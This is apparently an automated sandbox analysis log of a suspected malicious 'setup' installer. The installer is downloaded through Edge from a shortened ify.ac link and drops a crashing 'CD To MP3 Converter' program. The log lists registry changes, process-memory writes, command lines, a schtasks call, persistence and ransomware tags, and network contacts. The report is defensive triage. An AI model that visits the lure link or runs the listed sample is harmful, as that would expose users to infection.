Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "1514" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\Total C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\ify.ac\Total = "9" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads\setup_woMGQPOBj7.zip.i2yvpnb.partial:Zone.Identifier C:\Windows\system32\browser_broker.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-6SDC9.tmp\setup_woMGQPOBj7.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4400 wrote to memory of 768 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 768 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 768 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 768 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 768 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 768 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 768 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 768 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 768 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 768 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 4936 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 4936 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 4936 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 4936 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 4936 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 4936 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 4936 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 4936 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 4936 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 4936 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 4936 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 4936 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 4936 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 4936 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 4936 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 4936 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 4936 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 4936 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 4936 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 4936 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 4936 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 4936 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4516 wrote to memory of 4244 N/A C:\Users\Admin\Desktop\setup_woMGQPOBj7.exe C:\Users\Admin\AppData\Local\Temp\is-6SDC9.tmp\setup_woMGQPOBj7.tmp
PID 4516 wrote to memory of 4244 N/A C:\Users\Admin\Desktop\setup_woMGQPOBj7.exe C:\Users\Admin\AppData\Local\Temp\is-6SDC9.tmp\setup_woMGQPOBj7.tmp
PID 4516 wrote to memory of 4244 N/A C:\Users\Admin\Desktop\setup_woMGQPOBj7.exe C:\Users\Admin\AppData\Local\Temp\is-6SDC9.tmp\setup_woMGQPOBj7.tmp
PID 4244 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\is-6SDC9.tmp\setup_woMGQPOBj7.tmp C:\Windows\SysWOW64\schtasks.exe
PID 4244 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\is-6SDC9.tmp\setup_woMGQPOBj7.tmp C:\Windows\SysWOW64\schtasks.exe
PID 4244 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\is-6SDC9.tmp\setup_woMGQPOBj7.tmp C:\Windows\SysWOW64\schtasks.exe
PID 4244 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\is-6SDC9.tmp\setup_woMGQPOBj7.tmp C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
PID 4244 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\is-6SDC9.tmp\setup_woMGQPOBj7.tmp C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
PID 4244 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\is-6SDC9.tmp\setup_woMGQPOBj7.tmp C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
PID 4400 wrote to memory of 4936 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 4936 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 4936 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 4936 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 3948 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 3948 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 3948 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 3948 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 3948 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 3948 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 3948 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 3948 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 3948 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 3948 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 3948 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 3948 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 3948 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 3948 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 3948 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 3948 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 3948 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 3948 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4400 wrote to memory of 3948 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\LaunchWinApp.exe

"C:\Windows\system32\LaunchWinApp.exe" "https://ify.ac/1Ic5"

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Desktop\setup_woMGQPOBj7.exe

"C:\Users\Admin\Desktop\setup_woMGQPOBj7.exe"

C:\Users\Admin\AppData\Local\Temp\is-6SDC9.tmp\setup_woMGQPOBj7.tmp

"C:\Users\Admin\AppData\Local\Temp\is-6SDC9.tmp\setup_woMGQPOBj7.tmp" /SL5="$30420,6467263,56832,C:\Users\Admin\Desktop\setup_woMGQPOBj7.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "cd_2_mp3-converter_7143"

C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe

"C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe" b81472a76a30470126ad22360d008fda

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 812

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 784

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 856

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 960

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 992

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1008

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 936

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1016

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1284

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1552

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1596

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1576

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1576

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1648

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1724

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1616

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1860

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1560

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 2020

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1844

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1560

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 2024

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1080

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 2032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1932

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1924

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1692

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 2080

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1584

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 2160

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 2032

Network

Country Destination Domain Proto
US 8.8.8.8:53 ify.ac udp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 172.67.211.171:443 ify.ac tcp
US 172.67.211.171:443 ify.ac tcp
